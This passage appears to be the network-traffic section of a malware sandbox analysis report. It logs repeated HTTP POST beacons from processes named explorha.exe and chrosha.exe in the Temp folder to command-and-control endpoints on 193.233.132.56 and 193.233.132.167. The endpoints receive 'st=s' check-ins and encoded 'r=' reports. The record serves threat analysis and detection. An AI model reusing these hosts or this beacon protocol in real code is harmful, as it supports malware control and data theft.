                                                                                                                                                                                                                                      Apr 19, 2024 03:33:21.382230043 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:21.624852896 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      736192.168.2.550583193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:21.583569050 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:21.832477093 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      737192.168.2.550584193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:21.874053001 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:22.125102997 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      738192.168.2.550586193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:22.194175005 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:22.439335108 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      739192.168.2.550587193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:22.490041018 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:22.734837055 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      740192.168.2.550588193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:22.698704958 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:22.954735994 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      741192.168.2.550589193.233.132.167807292C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:22.984203100 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:23.235553980 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      742192.168.2.550590193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:23.321075916 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:23.566711903 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      743192.168.2.550591193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:23.602813005 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:23.853837967 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      744192.168.2.550592193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:23.816232920 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:24.064618111 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      745192.168.2.550593193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:24.098064899 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:24.343808889 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      746192.168.2.550594193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:24.435142040 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:24.687340021 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      747192.168.2.550595193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:24.696208000 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:24.943615913 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      748192.168.2.550596193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:24.940733910 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:25.193413973 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      749192.168.2.550597193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:25.195815086 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:25.450737953 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      750192.168.2.550598193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:25.556252003 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:25.802186012 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      751192.168.2.550599193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:25.801143885 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:26.045135021 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
